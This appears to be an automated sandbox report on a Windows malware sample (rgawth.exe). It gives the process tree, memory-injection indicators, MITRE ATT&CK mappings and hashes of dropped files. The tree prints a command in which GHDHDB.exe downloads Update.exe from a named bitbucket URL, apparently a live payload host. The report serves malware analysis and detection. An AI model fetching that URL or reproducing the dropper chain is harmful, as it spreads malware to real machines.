85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	rgawth.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2832	rgawth.exe
2832	rgawth.exe
2832	rgawth.exe
2832	rgawth.exe
2832	rgawth.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2832	rgawth.exe

Suspicious use of WriteProcessMemory 44 IoCs

description	pid	Process	procid_target
PID 2512 wrote to memory of 2384	2512	Setup.exe	30
PID 2512 wrote to memory of 2384	2512	Setup.exe	30
PID 2512 wrote to memory of 2384	2512	Setup.exe	30
PID 2384 wrote to memory of 2776	2384	cmd.exe	32
PID 2384 wrote to memory of 2776	2384	cmd.exe	32
PID 2384 wrote to memory of 2776	2384	cmd.exe	32
PID 2776 wrote to memory of 2832	2776	pikola.exe	33
PID 2776 wrote to memory of 2832	2776	pikola.exe	33
PID 2776 wrote to memory of 2832	2776	pikola.exe	33
PID 2776 wrote to memory of 2832	2776	pikola.exe	33
PID 2832 wrote to memory of 2804	2832	rgawth.exe	37
PID 2832 wrote to memory of 2804	2832	rgawth.exe	37
PID 2832 wrote to memory of 2804	2832	rgawth.exe	37
PID 2832 wrote to memory of 2804	2832	rgawth.exe	37
PID 2804 wrote to memory of 2728	2804	GHDHDB.exe	38
PID 2804 wrote to memory of 2728	2804	GHDHDB.exe	38
PID 2804 wrote to memory of 2728	2804	GHDHDB.exe	38
PID 2804 wrote to memory of 2712	2804	GHDHDB.exe	39
PID 2804 wrote to memory of 2712	2804	GHDHDB.exe	39
PID 2804 wrote to memory of 2712	2804	GHDHDB.exe	39
PID 2804 wrote to memory of 2924	2804	GHDHDB.exe	40
PID 2804 wrote to memory of 2924	2804	GHDHDB.exe	40
PID 2804 wrote to memory of 2924	2804	GHDHDB.exe	40
PID 2804 wrote to memory of 2612	2804	GHDHDB.exe	41
PID 2804 wrote to memory of 2612	2804	GHDHDB.exe	41
PID 2804 wrote to memory of 2612	2804	GHDHDB.exe	41
PID 2804 wrote to memory of 2724	2804	GHDHDB.exe	42
PID 2804 wrote to memory of 2724	2804	GHDHDB.exe	42
PID 2804 wrote to memory of 2724	2804	GHDHDB.exe	42
PID 2804 wrote to memory of 2756	2804	GHDHDB.exe	43
PID 2804 wrote to memory of 2756	2804	GHDHDB.exe	43
PID 2804 wrote to memory of 2756	2804	GHDHDB.exe	43
PID 2804 wrote to memory of 2640	2804	GHDHDB.exe	44
PID 2804 wrote to memory of 2640	2804	GHDHDB.exe	44
PID 2804 wrote to memory of 2640	2804	GHDHDB.exe	44
PID 2804 wrote to memory of 1632	2804	GHDHDB.exe	45
PID 2804 wrote to memory of 1632	2804	GHDHDB.exe	45
PID 2804 wrote to memory of 1632	2804	GHDHDB.exe	45
PID 2804 wrote to memory of 2660	2804	GHDHDB.exe	46
PID 2804 wrote to memory of 2660	2804	GHDHDB.exe	46
PID 2804 wrote to memory of 2660	2804	GHDHDB.exe	46
PID 2804 wrote to memory of 3044	2804	GHDHDB.exe	47
PID 2804 wrote to memory of 3044	2804	GHDHDB.exe	47
PID 2804 wrote to memory of 3044	2804	GHDHDB.exe	47

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2512
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2384
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\pikola.exe
    pikola.exe -ppivore
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2776
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\rgawth.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\rgawth.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Checks processor information in registry
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2832
    - - C:\ProgramData\GHDHDB.exe
        
        C:\ProgramData\\GHDHDB.exe https://bitbucket.org/1234jhgv/jhygtfr/downloads/Update.exe
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious use of WriteProcessMemory
        
        PID:2804
      - C:\ProgramData\GHDHDB.exe
        
        C:\ProgramData\GHDHDB.exe
        6⤵
        Executes dropped EXE
        
        PID:2728
      - C:\ProgramData\GHDHDB.exe
        
        C:\ProgramData\GHDHDB.exe
        6⤵
        Executes dropped EXE
        
        PID:2712
      - C:\ProgramData\GHDHDB.exe
        
        C:\ProgramData\GHDHDB.exe
        6⤵
        Executes dropped EXE
        
        PID:2924
      - C:\ProgramData\GHDHDB.exe
        
        C:\ProgramData\GHDHDB.exe
        6⤵
        Executes dropped EXE
        
        PID:2612
      - C:\ProgramData\GHDHDB.exe
        
        C:\ProgramData\GHDHDB.exe
        6⤵
        Executes dropped EXE
        
        PID:2724
      - C:\ProgramData\GHDHDB.exe
        
        C:\ProgramData\GHDHDB.exe
        6⤵
        Executes dropped EXE
        
        PID:2756
      - C:\ProgramData\GHDHDB.exe
        
        C:\ProgramData\GHDHDB.exe
        6⤵
        Executes dropped EXE
        
        PID:2640
      - C:\ProgramData\GHDHDB.exe
        
        C:\ProgramData\GHDHDB.exe
        6⤵
        Executes dropped EXE
        
        PID:1632
      - C:\ProgramData\GHDHDB.exe
        
        C:\ProgramData\GHDHDB.exe
        6⤵
        Executes dropped EXE
        
        PID:2660
      - C:\ProgramData\GHDHDB.exe
        
        C:\ProgramData\GHDHDB.exe
        6⤵
        Executes dropped EXE
        
        PID:3044

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4D1ED785E3365DE6C966A82E99CCE8EA_6BCA1153DAC084FF58DF6960444754E3

Filesize
471B

MD5
8878bd14a922a76c39f65ea2284f8bab

SHA1
7a1fc00ce6c2a7ca42fe7905ca95096b7269ccc4

SHA256
289a866027cd8e8fd7339156de48de3bfb3fd451689bed5b92414048d09f777f

SHA512
715c8deab58b0c47e2c2494f4302395c4a41b1bec7dd3f03bc2e6276f669ef4e1b6c16a52df18600b40490d322448918cfabb547afd0d7113cec1aef4435ff3c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\75CA58072B9926F763A91F0CC2798706_B5D3A17E5BEDD2EDA793611A0A74E1E8

Filesize
1KB

MD5
7b707c4a05567a4921580c6b24f25c02

SHA1
89a4171ac74429cc72657c5cdbf5ce6c269d40d6

SHA256
29922ead5b9d596f415a8e550fadfc33dbf9df661fe810c4bd77f2c33d9a57c6

SHA512
1f21e1f73fc1d1bedbc43466a8a09327169dd786e3b42a17be52e542e2dae27363e0c6d6084f4ed8060e7e4e54c0893412ec071cd3b130fd2cbecf369e2743f3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62

Filesize
2KB

MD5
76e828213eed9c92948c5ba7ddf572a0

SHA1
21937ac4a72d85d68040c78bfd80139f5b92ca78

SHA256
48ec952a3c3138e07ab09990a1cde16e1955bdc2f1cd36ffbbe21af475c82941

SHA512
b8526b08de7d458af23e8dc0d883c69be81d698b58c32192ad9890dfa22f8cfdc4b844d75a38405061fbe57053231872327825f283efbb551239d16c36ef432c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894

Filesize
1KB

MD5
805b39c993a04a90fffb1126bcefe6aa

SHA1
c0e2666400061ee34ac065e3b566ebcb6e76e858

SHA256
096a83427a82046689412043fd8ef52a88feaa3e8abcb2f32a7669e7885c899d

SHA512
90cfb4d4b12b1bcf7c4cef5bde9b82797feb9275165518a34700f35e6adc17c83c34450bbcc19a2bcf0702acbf6d964ce053a7037b123de0d608e1dd5eb52699

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D03E46CD585BBE111C712E6577BC5F07_56B2A1FF8D0F5C5B4060FCF88A1654FE

Filesize
471B

MD5
7bedebf3bef4b851c19efcd0f32c8353

SHA1
4fde83c0ec957d7762f91bff764aadba9a7931c4

SHA256
91399805fee07d689013e97c55b4fe7a3b4a359dd4c0b734218b729c0aab912c

SHA512
fd5329aa0f11cdbf5431f3eb5be9f4ec30e2075d3d7e22a7c2aae902181267e2be1f1a4b54c296ace6ada432fce6a7c4998524f06943121e1bf02df7a58b89ca

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619

Filesize
471B

MD5
41256db59356030efe7922fc04460559

SHA1
5cf59d04f97324ded9f9b32312eb7e4a74bf4108

SHA256
f00323b9f74cc54bf22586ea7eb1d3d6c8d6c68908b7ad44868a5719785c2023

SHA512
ba9b043938da53561194afe9935fec9e7066d078391929b97835603c6bb0cb77c16a619f87af9a7077398093797bef9160361371dacd7378391f72fc537a67ff

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4D1ED785E3365DE6C966A82E99CCE8EA_6BCA1153DAC084FF58DF6960444754E3

Filesize
400B

MD5
96f9484ec16ca411d7d4189425b2ba45

SHA1
ad8c9e3427b1292e89f8c076ae6cea840f982601

SHA256
0ef9fc826eb8afd973dcde8dae5f75e680cb927ecce0b93d79dbe30b721bd3d2

SHA512
17ef32d0c85353274b0707b434b6f18607803465087c9d47882468804567c0387ac67c1a40fc7db4dc53bbea7e1ff885bc63594cc4b9a077d311da3456e49a01

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\75CA58072B9926F763A91F0CC2798706_B5D3A17E5BEDD2EDA793611A0A74E1E8

Filesize
438B

MD5
84baa773e7dc44cdacf4213a84a3fd69

SHA1
8738ed9e9933a25114a011097e4002293970193b

SHA256
f9104c6d2ba84f018a5c38566f674ef5a166ebfbc99bc34c45f2c68cdaae9175

SHA512
00394f694c01f46f9137c95a5c7177608d148cbb93ad406b112cd70763c92bc1a6e2d995071fc78dd0a3ebc92a13cc7d59c3ecd7416ffb4c0737fb0bf3b5c2e3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
c31649b5feb02a3c476d9c0b25bae57f

SHA1
a15e77e4e09ae133db7df266fb94dad14cab1c02

SHA256
c49f755796b9ca545b12736d83384b3a6cc7c89f7ada05349c22fd76c3a95c61

SHA512
9c070d5b7483e1767f3537d67a5cc2fa982256d41f4d238d822b39afc97106a3033383a11aa33091995ae01c39f3b67de32c24945d33dbafa588a05712bdb3eb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
bebd60bd7255299910519b8c8ff57237

SHA1
c5d799cb4f98912ce8ee4afa90442e6012198359

SHA256
d64512fd444718db4ccf67f735f28b38bb0a3ee01651a9a4a4970a49929e22c5

SHA512
d2be5901ba76348d33dcf765ba7d3862dbbf2c4cf7649d805119596d548ab7bf2fb28076a3a2fcf84c607a1f7b6f4b453451132ebeb737588d0db75d0c0fd273

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
565f764772c738d10af50de67450af5a

SHA1
9354e345b80480715bb0b345dc050077a6d55684

SHA256
e7a0b80446fc7212995deeb2edeb747697a3c71b9f12409d3fef20314153f2e0

SHA512
a79fab323fa150d7125b8750906254c2ac98b0e2f4c0d76d0af6b1e2b5703eb5504e0b00cdd68c6580aea3e454bc1b8bb6fb6b8fb311917f46e1b35b42101b39

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
49fd89291c177133bf4d862bf5adc90f

SHA1
b929f9bfd246c3c66733ffe0a5f07a7eba096182

SHA256
1021861a2d5e8b763aa6c4ffe96bac409da3e5da2d3a4c490bfdc9060ccb1970

SHA512
c3f8b9b2853ffaeb248784c7ee842e4c595f80ea0655c700175aee499631bc03b770c0ee927069a7f5c685883c971c751f918b9c3be68eb225b09c6f16e505c8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62

Filesize
458B

MD5
7b0f001ebf3a81a6e918f98f5bfabc49

SHA1
f66e25612f5a7dcd66f9400c1d77e55ecb9ee036

SHA256
9029de66357c3fe8d4f4fd5ab072099dab54b4541bd6ad48bc53f655448997bf

SHA512
82f353fe43ced5c8ed9034f9d8660403a5326f07c0e6c443416f98f70167d668c19491d4c349ea637825a6cb40096c6cf97828527787c8be37c9221b58a87e22

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894

Filesize
432B

MD5
8909ae9bc50388bc7f7c6f89a5d94b7b

SHA1
4b4d4e7fdbbc351130bd506f52304fe77d7d8e5a

SHA256
a16894cbd71126c6b58e8b18c6bf32962b4a54f57f5c22917786a6fa60c06201

SHA512
b2e3f049edc177529883afeb42ac79f669b964e9d8b051c4d2ee7608e8d8f6c918aae6080e41b9cb97cc9220ef76af924ddedeb5ef4364d937b4f44ccbf8495b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D03E46CD585BBE111C712E6577BC5F07_56B2A1FF8D0F5C5B4060FCF88A1654FE

Filesize
418B

MD5
86b3f61a90e3a8fb2b04cb1eae7289ab

SHA1
0ce8a9d8686b5aca83c26a6cae509a98d662cf48

SHA256
007dc8fa33e68583f4b125c43f293807ec1e63073e41d838ba86f4af94830a59

SHA512
0a9dfda5fa767e72db7c2526f8a2b9cd0e901aca6ebaf53854a02444c33bb3482352e86a8671679a0b0d05de2f83a822413e6d2202188fec210e11e0cac1697b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619

Filesize
400B

MD5
bae3c2e651e0379e8f08b3675e40af1b

SHA1
ce0ccb413aae1e4b572e5e0eebd4cc38b0f64e68

SHA256
2a3363ff1e33e2984166a01e0853f76ec4817769c177f569314853a49891c7a3

SHA512
00ec6711e53d3b255888af465aa8c380467b8fc374a68e96856194395f74e576530b0b7a886e3209e081d474880f9b451f98f2c12a684dcfb2a9bb63c22a2894

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YW15VCHK\Update[1].exe

Filesize
6.1MB

MD5
6044436058d895c5f11bd69742675411

SHA1
d55350aa01ca32a5d5f015d892eeae3edc81189c

SHA256
564570e26c2e8682c181ffbba655590a5cce262ffa6ab73467dff64e9a65904c

SHA512
a88d7f47aa96209aacfb3ef1d9421ffb3542b44e49cf89f0c63ec1c311039f756a2e4df4ddbe3678995d07600de7eaff8219a9b07d02433a89bfc9a302d941c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabB76F.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat

Filesize
36B

MD5
57763e1c0b9a681adcbeabb751ef4ca5

SHA1
0173fdd3469f7e580719bf69e6f62f9616a36b06

SHA256
25135d26bc14f31825318db6d3f68e2abf826a6a76ac4d3647291045e6198610

SHA512
7dd34652b07235e31aa13beef7292da56851007a051d805ff9f378d998d3d5fe489fedc93cac28a3d242f6416c2026d3bcdd6d257963ab65a64edd30ebb87260

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\pikola.exe

Filesize
1.6MB

MD5
ad70fa49c2c2231a2675f50ec84839a4

SHA1
bf06da874316e2d3a94f645736b985b6c4826325

SHA256
5e18f14a182675b8353f0b85c4aa003ea02e9f737274a55795c01a08d5d738e6

SHA512
6ea0c9935e67656ab86240030cef2a538fb3b719264bd75ab364b3b828ab0c46022019af62661e85d278a3b8af789b1da22641c99e45ea011fa2e8bbe6118186

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\rgawth.exe

Filesize
1.1MB

MD5
5bd956880091b64c30ecc00ba5b61ebd

SHA1
19efa2cc8399c6add9f0a30e1fb51535623e50a6

SHA256
04bd08936aaeb8ccef9552f8050c7f10f30690a4929bf10cb343b6cde614f5ca

SHA512
231d2bffb276b37a9660d6499cce85565b1a5891cec163a1959fa25970a0629ca3de02bf290ee4f9e28c2e503e5df2d5aaf9fa180c661403e8e7991f21df407c

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarB782.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
\ProgramData\GHDHDB.exe

Filesize
6KB

MD5
2890a00ef6943ed98e2b7c6e3e49ae1c

SHA1
9072a751e68fe39222aebc87ffb898a423310ce9

SHA256
0ab41930f0a18d7629031bf5cd9a8c7090c13983c1d7567b9018185f0fa18f0d

SHA512
dd01c349264e431f3ec900e05062fa4300a4f8a9219edf4f7f8014a92dadd4aae0f05cc4a103f30bdd4d9915460edb03769ffdff0c9e290acd4c89b3a16542fe

Download Submit
memory/2832-35-0x00000000012D0000-0x000000000187D000-memory.dmp

Filesize
5.7MB

Download
memory/2832-205-0x000000003A920000-0x000000003AB7F000-memory.dmp

Filesize
2.4MB

Download
memory/2832-414-0x00000000012D0000-0x000000000187D000-memory.dmp

Filesize
5.7MB

Download
memory/2832-352-0x00000000012D0000-0x000000000187D000-memory.dmp

Filesize
5.7MB

Download
memory/2832-642-0x00000000012D0000-0x000000000187D000-memory.dmp

Filesize
5.7MB

Download